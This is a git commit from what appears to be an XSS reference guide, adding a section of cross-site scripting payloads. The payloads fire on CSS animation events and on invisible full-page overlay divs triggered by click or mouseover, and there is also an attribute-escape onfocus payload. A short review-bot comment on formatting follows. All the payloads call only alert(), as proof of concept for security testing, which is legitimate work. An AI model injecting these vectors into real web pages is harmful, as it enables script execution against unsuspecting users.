GitBook: [master] one page modified

CPol 2021-02-25 11:06:26 +00:00 committed by gitbook-bot
parent b3d7d120b5
commit 7517161d89
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 12 additions and 0 deletions


@ -190,6 +190,18 @@ If you **cannot escape from the tag**, you could create new attributes inside th
" autofocus onfocus=alert(document.domain) x="
```
#### Style events
```python
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
### Within the attribute
Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.
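Review bot: the fence opened under `#### Style events` is tagged `python`, but everything inside it is HTML, so it will be highlighted with the wrong lexer; tag it `html` like the markup it holds. The two explanatory lines inside that fence use `#` as a comment marker, which is not an HTML comment, so a reader who copies the block gets those lines as literal text alongside the markup; write them as `<!-- ... -->` or move them out of the fence as prose above each snippet. The first of them also reads `#ayload that injects an invisible overlay...`, which is missing its leading "P". Finally, the section has no sentence saying when these style-driven events apply, unlike the neighbouring sections that open with the injection context; a one-line introduction under the heading would keep the page consistent.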